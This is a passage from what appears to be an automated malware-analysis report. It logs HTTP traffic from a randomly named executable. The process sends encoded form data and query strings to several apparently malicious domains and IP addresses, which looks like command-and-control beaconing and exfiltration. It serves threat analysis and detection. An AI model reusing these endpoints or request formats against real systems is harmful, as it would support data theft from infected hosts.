                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.inspires.website
                                                                                                      Referer: http://www.inspires.website/tv3i/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 6c 79 43 74 69 6b 76 44 67 37 77 30 4a 63 48 73 4c 4c 31 78 59 47 71 6c 6e 56 31 67 4d 49 37 35 67 73 46 2f 75 62 51 4f 61 5a 63 7a 66 4e 34 71 6e 37 32 4f 64 59 77 70 69 52 53 71 72 4e 78 33 4f 34 63 75 42 78 66 48 6b 66 4c 65 38 52 33 4d 49 36 6c 55 39 67 58 49 2b 70 49 59 4f 58 6c 46 76 38 53 33 41 4a 75 51 71 67 42 47 6a 53 61 52 6f 44 2b 4b 74 64 42 67 46 55 52 2b 55 47 6d 74 62 59 48 51 72 36 6f 74 35 55 65 63 6a 53 6b 2b 66 50 36 32 6c 31 75 35 36 39 6a 67 4a 43 46 2f 55 36 41 34 4d 78 2f 4a 75 74 4c 75 39 68 78 77 77 65 2b 76 61 4b 46 64 4d 5a 70 58 7a 46 30 74 76 79 41 44 54 66 55 65 31 76 39 68 31 36 6a 4f 54 38 44 46 32 6a 55 51 51 4b 30 2b 6f 38 33 43 67 51 6d 75 42 2b 6d 52 67 68 76 6c 4f 50 50 4a 55 42 36 2b 78 4d 67 55 39 2b 71 69 44 64 6a 79 35 5a 45 45 47 74 69 39 62 71 41 64 78 57 33 77 6d 52 6e 6c 56 77 59 6d 48 67 68 4b 33 57 30 37 34 61 70 32 4c 47 36 4c 55 30 76 68 30 74 5a 2f 6c 76 44 52 73 4e 47 43 4a 35 53 49 71 33 41 67 4b 6f 30 64 76 7a 57 39 58 78 61 32 39 71 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=lyCtikvDg7w0JcHsLL1xYGqlnV1gMI75gsF/ubQOaZczfN4qn72OdYwpiRSqrNx3O4cuBxfHkfLe8R3MI6lU9gXI+pIYOXlFv8S3AJuQqgBGjSaRoD+KtdBgFUR+UGmtbYHQr6ot5UecjSk+fP62l1u569jgJCF/U6A4Mx/JutLu9hxwwe+vaKFdMZpXzF0tvyADTfUe1v9h16jOT8DF2jUQQK0+o83CgQmuB+mRghvlOPPJUB6+xMgU9+qiDdjy5ZEEGti9bqAdxW3wmRnlVwYmHghK3W074ap2LG6LU0vh0tZ/lvDRsNGCJ5SIq3AgKo0dvzW9Xxa29qX9vUBEsKVPd3Mi8SLRCk0nV/ObHigvSC38pngOF4lce/uat4b/a0cII9hNQ2vh/bGszYBjruly+pI+LBKt9osV/x+tOLH7ALURr3D6YkjVIjP8eDN+DstEsmHXlKArDAvhCeDkI8TXtVRi/9Kl75W3zBaY9nfnYbhxE4g7m6ZNvDGnt/WsuVCYHjt2Iu29oBGbZmikiJN0Dz7SkLqmON75qaPyonmJfy9iwrN8/Joz0PG8dZ+ZKd44gZnkovb+EZ5vZCCmRQM2+5k2agK5I0+fURCOrVXVIn6Go9ORBcC6nzHUCCZLDPkFMQXFjksg55RQeTLVhNP7ErmNnDJ/96kG68mOHG978/4uAxIzSBTDM+1scDVSXrMNt0Iw23b7qTu/gsGQzBdniu7gOVqaaz+VolvPxOOAQcgeVtgpamTiRuXPvXF0UY9ARbzBBUB58OIhIf4f/wlirRZmc0lq33e2NBb/08HEO09hdMXW+MfdahKTytSk4hN4w3DPtllY1F7WeDr7g0Pmihcr3BHiewkIFEKyp/zoGuA6/gTRnE4BnIigk1/wt4HSRQB1v1+rpDmXcyta+7tfx3vo7WZtq94UzMbB6EVY0ygJdII32Pl2O1RZkbSwh9fKMPEBqVI+INllOf6zfBJtZHO3qmk/XclE2NmBxniuWC5k [TRUNCATED]
                                                                                                      Nov 18, 2024 13:55:11.227847099 CET533INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:11 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.550002203.161.49.193801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:13.062254906 CET489OUTGET /tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStp HTTP/1.1
                                                                                                      Host: www.inspires.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:13.767194033 CET548INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:13 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 389
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.550003104.21.74.79801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:18.863425016 CET737OUTPOST /qpp1/ HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.tenmyk.shop
                                                                                                      Referer: http://www.tenmyk.shop/qpp1/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 57 50 4a 2b 38 30 44 52 59 49 74 72 47 4e 73 30 38 71 73 4d 71 57 32 75 65 66 70 56 61 39 43 58 2f 48 52 53 4a 4e 59 63 7a 2f 33 4e 6f 71 41 65 36 4c 34 78 6e 52 34 7a 35 4b 51 75 56 77 53 48 78 77 75 7a 54 78 54 75 56 34 31 4c 78 33 50 71 6d 53 63 61 35 58 76 36 58 6b 63 6f 6f 75 61 65 75 64 65 69 59 39 46 44 30 6a 51 4e 64 50 68 52 56 6d 79 47 30 46 51 62 6a 5a 71 55 79 76 66 6b 2f 50 53 6d 49 74 34 65 6e 38 5a 65 36 43 75 6e 31 4c 74 74 32 4d 6e 32 79 74 46 55 56 70 76 62 48 74 6f 77 42 78 76 52 35 33 55 4b 42 5a 5a 4a 43 4a 4b 74 69 76 62 2b 68 39 36 61 73 57 42 79 33 50 61 4e 48 7a 30 3d
                                                                                                      Data Ascii: 3Vh=WPJ+80DRYItrGNs08qsMqW2uefpVa9CX/HRSJNYcz/3NoqAe6L4xnR4z5KQuVwSHxwuzTxTuV41Lx3PqmSca5Xv6XkcoouaeudeiY9FD0jQNdPhRVmyG0FQbjZqUyvfk/PSmIt4en8Ze6Cun1Ltt2Mn2ytFUVpvbHtowBxvR53UKBZZJCJKtivb+h96asWBy3PaNHz0=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.550004104.21.74.79801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:21.405524015 CET757OUTPOST /qpp1/ HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.tenmyk.shop
                                                                                                      Referer: http://www.tenmyk.shop/qpp1/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 57 50 4a 2b 38 30 44 52 59 49 74 72 47 74 38 30 77 72 73 4d 39 6d 32 76 43 76 70 56 4d 4e 43 54 2f 48 56 53 4a 4d 74 58 7a 74 6a 4e 6f 4c 51 65 67 4f 55 78 6b 52 34 7a 79 71 51 76 52 77 53 63 78 77 69 52 54 31 54 75 56 37 4a 4c 78 32 2f 71 6d 6c 41 5a 34 48 76 34 50 55 63 75 31 65 61 65 75 64 65 69 59 39 42 35 30 6a 49 4e 63 36 78 52 55 48 79 48 36 6c 51 59 71 35 71 55 6c 2f 66 67 2f 50 53 41 49 6f 68 78 6e 2b 68 65 36 44 65 6e 77 4f 52 75 38 4d 6e 77 32 74 45 6b 56 4b 47 41 50 37 38 6b 63 6e 71 43 6a 52 6c 72 41 76 6f 6a 59 72 43 46 78 50 33 47 78 75 79 74 39 6d 67 62 74 73 4b 39 5a 6b 68 53 46 36 61 31 6f 79 4a 75 41 35 45 39 66 4b 39 78 59 35 33 45
                                                                                                      Data Ascii: 3Vh=WPJ+80DRYItrGt80wrsM9m2vCvpVMNCT/HVSJMtXztjNoLQegOUxkR4zyqQvRwScxwiRT1TuV7JLx2/qmlAZ4Hv4PUcu1eaeudeiY9B50jINc6xRUHyH6lQYq5qUl/fg/PSAIohxn+he6DenwORu8Mnw2tEkVKGAP78kcnqCjRlrAvojYrCFxP3Gxuyt9mgbtsK9ZkhSF6a1oyJuA5E9fK9xY53E
                                                                                                      Nov 18, 2024 13:55:22.916084051 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Mon, 18 Nov 2024 12:55:22 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-litespeed-tag: 3d9_HTTP.404
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      link: <https://tenmyk.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                      x-litespeed-cache-control: no-cache
                                                                                                      vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkunI7DZZ%2FqdJCgZNv95YCgaZuMrjcFlpnDSXFBAxX7vXbaTCd%2FDTxBG7V2EetXO7f4qxUP63pn1TNX5OJbcFihpCgzrW9rwuocCfToDH2EnoRijBYiXsBnoZo7N9nBjCRo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481d4a0fe16c80-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1144&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 64 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 1a 69 73 9c 38 f6 f3 f8 57 60 5c d3 86 89 a0 a1 0f b7 4d 87 4c 66 72 ec 51 99 71 2a 4e 6a 6b cb 76 a5 d4 e8 41 cb 06 89 95 44 1f e9 e1 bf 6f 09 fa a0 0f c7 5e ef ce 3a 95 04 9e de ad 77 49 f8 e5 f1 db cb 37 9f ff f9 f1 9d 31 56 59 fa ea e8 a5 fe cf 48 31 4b 42 13 98 f3 e5 ca 34 72 01 31 9d 85 26 4f 02 63 ac 54 2e 83 76 9b 27 b9 9b 41 9b c9 13 d3 88 52 2c 65 68 a6 1c 13 ca 12 47 52 05 06 e3 ce 9d 34 35 3b c0 e4 d5 d1 0f 2f 33 50 d8 88 c6 58 48 50 a1 f9 e5 f3 7b e7 dc 34 da 7a 25 a5 ec de 10 90 86 66 2e 78 4c 53 30 8d b1 80 38 34 b5 ac a0 dd 4e b2 3c 71 b9 48 da b3 98 b5
                                                                                                      Data Ascii: dc2is8W`\MLfrQq*NjkvADo^:wI71VYH1KB4r1&OcT.v'AR,ehGR45;/3PXHP{4z%f.xLS084N<qH
                                                                                                      Nov 18, 2024 13:55:22.916368961 CET212INData Raw: 7d 7f 9f 8a b2 64 84 a3 fb 26 99 56 51 01 cb e6 f7 ae 1c f3 bc 3d cb 52 91 47 6e 3e ce 2b f2 a3 1f f4 cf 4b 19 09 9a ab 57 84 47 45 06 4c b9 ab 87 77 29 54 ef 95 61 bf e3 0c 8c d0 78 02 d2 0b e3 d4 98 83 74 ee a4 71 27 bf e2 48 d1 09 18 77 f2 f4
                                                                                                      Data Ascii: }d&VQ=RGn>+KWGELw)Taxtq'Hwe{)))=n/[<XQQS0AhN(Ls.iD)`*4qH`B#pdPF##BX{WE4620.sE3kcVcY
                                                                                                      Nov 18, 2024 13:55:22.916515112 CET1236INData Raw: c0 ec 3e c3 6a ec 46 3c 6b 1b 8e f3 ea e8 a5 a2 2a 85 57 1f 71 02 c6 ef 5c 19 ef 79 c1 88 e1 18 6a 0c a2 88 e3 14 88 e0 5c 2a 10 2f db 35 e6 96 05 82 8f b8 92 0d fd 63 9e a6 7c 8a 0c c6 29 23 30 33 db 2b fc 5c f0 1c 84 9a 57 f1 9b 72 6d 4a 83 0c
                                                                                                      Data Ascii: >jF<k*Wq\yj\*/5c|)#03+\WrmJW<obhZ6!N:j;G\DMR Ea1bW$}u_<QkG#1d|0_Wf[/7:8|]H`~"5%f+"i|xV
                                                                                                      Nov 18, 2024 13:55:22.917190075 CET1236INData Raw: be 67 07 d4 8d 04 60 05 cb 81 da 32 eb 2c 30 6d 84 43 a1 93 e6 4d 7d 02 b2 cc 0e 31 d1 62 4a d3 f4 13 60 f2 5e c0 bf 0a 60 2a 9d 07 c7 5e 69 23 1e 5a d8 d5 78 bf 62 09 29 65 ba b7 e8 11 1a bb 31 d7 a7 b5 33 cf 33 ba 9d 7c 66 fc 22 28 4e 4d b4 28
                                                                                                      Data Ascii: g`2,0mCM}1bJ`^`*^i#Zxb)e133|f"(NM(n;e/5^>f+ER.Dx!90fLSb)<gTBeD2-#1wYeSE)AU9\@]L0O6XZp
                                                                                                      Nov 18, 2024 13:55:22.917202950 CET424INData Raw: 66 4f c8 e0 02 eb dd e8 e1 fe c5 16 7b a6 03 4a 77 84 67 eb de ed 7a 17 67 e7 e8 a4 eb 47 24 8a b7 98 67 94 b0 55 c0 3e 2b 7a 3a 5e f7 dc 47 27 9d f3 41 2f 8e ec b2 62 2a 20 29 52 2c 36 59 bb 58 3f 05 3e 64 35 52 f5 e5 ee 30 4e c7 3d eb f4 57 78
                                                                                                      Data Ascii: fO{JwgzgG$gU>+z:^G'A/b* )R,6YX?>d5R0N=WxuQ87z,5E?gtWe$!{)~'.GB5[-Vn[-nWsWHEc~n8#j`sde.zmA>qmn}rr"Ji
                                                                                                      Nov 18, 2024 13:55:22.917213917 CET213INData Raw: 7c 4f ff 94 d5 2f e6 04 d3 31 08 b0 aa dc 58 ce 17 95 d2 f6 62 f9 56 4d 90 81 e4 29 25 5b 14 d7 d5 c2 4f e1 12 4d f1 bc 26 bc 5d 53 6a d0 13 a9 ab f8 dd a5 af 81 4f e4 30 e2 4a f1 6c 97 c5 12 fa 44 1e da f5 bb 1c 2a d8 13 e9 2b 57 df 3e c7 73 3b
                                                                                                      Data Ascii: |O/1XbVM)%[OM&]SjO0JlD*+W>s;vzfu+?{wnE32<s9y?K&{v,SFs9Fi,cjQk^3bXu<_}7


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.550005104.21.74.79801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:23.955598116 CET1774OUTPOST /qpp1/ HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 1240
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.tenmyk.shop
                                                                                                      Referer: http://www.tenmyk.shop/qpp1/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Data Raw: 33 56 68 3d 57 50 4a 2b 38 30 44 52 59 49 74 72 47 74 38 30 77 72 73 4d 39 6d 32 76 43 76 70 56 4d 4e 43 54 2f 48 56 53 4a 4d 74 58 7a 74 37 4e 6f 35 49 65 36 70 41 78 6c 52 34 7a 78 71 51 71 52 77 54 4d 78 7a 53 56 54 31 58 2b 56 2b 4e 4c 77 56 33 71 6b 58 6f 5a 32 48 76 34 54 6b 63 72 6f 75 61 4c 75 64 4f 6d 59 2b 70 35 30 6a 49 4e 63 39 4a 52 43 6d 79 48 34 6c 51 62 6a 5a 71 75 79 76 66 49 2f 50 4b 2b 49 6f 74 62 6e 4e 70 65 37 67 32 6e 79 59 46 75 36 63 6e 79 37 4e 45 38 56 4b 61 6c 50 2f 63 53 63 6e 33 5a 6a 57 4a 72 43 65 5a 48 47 36 65 46 72 66 69 6e 7a 64 6d 41 74 47 55 36 6c 36 57 4a 55 6e 35 78 43 4a 75 62 76 43 31 45 43 61 6f 31 42 4d 41 72 63 38 32 76 67 76 73 7a 52 77 68 78 70 4e 61 39 4d 76 4b 4a 45 6d 44 79 70 77 58 68 75 4b 4b 2f 41 78 67 34 61 4e 69 43 77 36 54 38 53 56 61 41 33 47 33 6f 66 71 31 56 78 44 78 6d 73 73 47 41 30 44 72 77 6a 4c 5a 6c 6b 42 34 49 64 6f 6e 74 51 4b 74 77 48 62 7a 57 34 58 36 41 79 41 6b 72 69 6c 56 50 42 38 67 6f 36 61 50 34 4e 56 53 70 66 63 36 4c 2f 34 [TRUNCATED]
                                                                                                      Data Ascii: 3Vh=WPJ+80DRYItrGt80wrsM9m2vCvpVMNCT/HVSJMtXzt7No5Ie6pAxlR4zxqQqRwTMxzSVT1X+V+NLwV3qkXoZ2Hv4TkcrouaLudOmY+p50jINc9JRCmyH4lQbjZquyvfI/PK+IotbnNpe7g2nyYFu6cny7NE8VKalP/cScn3ZjWJrCeZHG6eFrfinzdmAtGU6l6WJUn5xCJubvC1ECao1BMArc82vgvszRwhxpNa9MvKJEmDypwXhuKK/Axg4aNiCw6T8SVaA3G3ofq1VxDxmssGA0DrwjLZlkB4IdontQKtwHbzW4X6AyAkrilVPB8go6aP4NVSpfc6L/4osSRyW8pw5gxQPaGTyLEm70MWVTW5DrWmfIG19bzTnmpXyXCnGEURctRIL4i8OSh34hDLMYcZI0mhPkBFvGioI/YKrTLyMHajMVa+4hbRmdHWV2M+foZKYZc9LWGR1AE4QWQJjBJSWuM7mUMw2AQvyM/MwwpC8Of2K7hwYO4NjEYXm0gG8K38Hs5LFDsN3RbL76YvysFeALSid2w95dpYoBiL/ejdSfC9VYxq8wBy0n+NMhBb6MJnvpvmrQA4iR0w0rL/k2cYNIz6nbDjIwXLXR0LXBhsX7iR/6tbIYdU7F/oGjkoPpw2chXpHTzFhgi4cZfbyqa6Opj3OdXo7PZxMztpwyJyht6vBQIr4dL2+bfxBPRs/vauiHjPJfmN5asTTKfYigpnvzzgRQOr69kp/RUOIu65WRP31IpcLIqKc6Z/+uYbO9iyNNE11P4Qz6iMH3qPnaXfbUeKVmVflJ1+kAaeVh2X7UWR/jjdV3PvZk7SfmcF2PD3UVOI3o7rS5lexOq9MwPORq51Zmirr1ZBoI0IlDTvR1bbjkbuxl9rKCXuBVRXvJn+daDCZiTXk+BKwfwnqINQBN07rfvOYSjeqlbxZ/xF+qoEzsvIfO8I1SBizyhyS/AY7KINDxro0KvlNa0t7aTaIbpP1WO68Y5Y3iTiK0t+5QJMV [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.550006104.21.74.79801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:26.498333931 CET484OUTGET /qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A== HTTP/1.1
                                                                                                      Host: www.tenmyk.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36 OPR/31.0.1889.161
                                                                                                      Nov 18, 2024 13:55:28.069297075 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Mon, 18 Nov 2024 12:55:28 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      x-redirect-by: WordPress
                                                                                                      location: https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A==
                                                                                                      x-litespeed-cache-control: public,max-age=3600
                                                                                                      x-litespeed-tag: 3d9_HTTP.404,3d9_HTTP.301,3d9_404,3d9_URL.79a15f4fd7f632a198a3e44f6d3400cd,3d9_
                                                                                                      x-litespeed-cache: miss
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnvR8SSPONKxgOTMnsMdswbnpz0xGqNC1R0umit9TGfCDTZFjL8jy%2F%2FHBkuX%2F%2ByuxTL6jf1%2B5XGzbUuazd7%2Fazyd21%2FpixQ72m7NeSoikMIzV9eFycesLKDPCFaiQqTuyPg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8e481d6a0c193ad0-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=00000000000000
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Nov 18, 2024 13:55:28.069547892 CET20INData Raw: 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0&ts=0&x=0"0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.55000715.197.204.56801896C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Nov 18, 2024 13:55:33.123099089 CET743OUTPOST /guxl/ HTTP/1.1
                                                                                                      Host: www.isirumah.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Connection: close
                                                                                                      Cache-Control: no-cache
                                                                                                      Origin: http://www.isirumah.info
